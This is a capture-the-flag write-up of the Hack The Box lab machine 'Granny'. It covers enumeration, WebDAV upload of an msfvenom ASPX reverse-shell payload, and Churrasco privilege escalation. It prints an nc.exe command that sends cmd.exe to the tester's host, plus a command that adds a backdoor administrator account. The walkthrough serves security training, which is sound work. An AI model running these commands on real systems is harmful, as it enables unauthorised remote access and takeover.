# Granny HTB

## Enumeration

* We use nmap for enumeration `sudo nmap -p- -A -T4 -O 10.10.10.15` which gives ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8ffd9d2e832701f8e8ae59a2d011fa5e9c04c52a%2F678e9d802489391b23ea087823544165.png?alt=media)
* We find that a website is hosted:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ff04d6a65e70558070367a8f06fdf877f597146f%2F4de56f784020bd493cdc884ed934eda8.png?alt=media)
* We used dirbuster and found some hidden directories but they are empty![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-aff737b03b362c0116ed5cf88e190cace1572ba3%2F2894ac828545017c7554ac988fab6b5f.png?alt=media)

## Exploitation

### Non-metasploit

* WE find that certain risky requests are permitted using davtest![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d3b094ced7f369eb76f66e66f7ff8acd7df37026%2Fc61997cae39eede6e853037e2b083b49.png?alt=media)
* Only text and html files are executable so we generate our payload to .aspx format and rename it to .txt using `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=1234 -f aspx >reverse.aspx` and `mv reverse.aspx reverse.txt`![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-88d33697e2617846155d47bf59bb55a62d648af8%2Ff37bba16e9e34c034804553b7d56d2ca.png?alt=media)
* Then we use cadaver to start a dav session using `cadaver 10.10.10.15` and use a put request to upload our reverse.txt file then rename it to reverse.aspx using move![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e15e6282d01a8208f7709d85e3cec87b3edf290a%2F668b8e6a614bb6d2809e59f1e5f9e719.png?alt=media)
* we visit html://10.10.10.15/reverse.aspx with netcat listening where we get a shell![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b486837be1e3964b71a98ce2d667081019e6f9fd%2F28ca2624a2179607caf213cc9aadd3e9.png?alt=media)
* We used the churrasco exploit from <https://github.com/Re4son/Churrasco> and nc.exe file by uploading in the same manner and executing `churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.25 4444 -e cmd.exe"` and listening on netcat using `nc -nlvp 4444` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a76b7280d7ab5d6e00fdaf0ba068d07339f600d7%2F22bc0f914d1eb59b601fa31228af87f9.png?alt=media)
* can also run `churrasco.exe -d "net user hacker hacker /add && net localgroup Administrators hacker /add"`
* We get a root shell: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-617b217e5073d5c5b241f6beaf153fc0a42f66fb%2F12bad755152eb233a29ccd78fd2e99db.png?alt=media)

### Metasploit

* start metasploit and search for IIS exploits, find one and execute to get a meterpreter shell:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c19002cf8ebb7bf2c3753225d7680d68f7343386%2Fbc9f10516acc3ce75146b70c48877944.png?alt=media)
* using ps to list processes:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dc07526f43ac1059c533c542aa03b00c89b9a3e8%2Fc6deac7ba1aa16e85895e2058e1eeaca.png?alt=media)
* We migrate to process 1964 for accessing the user
* We use exploit\_suggester and exploit and get a shell. As all this is pretty self explanatory we wont go into detail.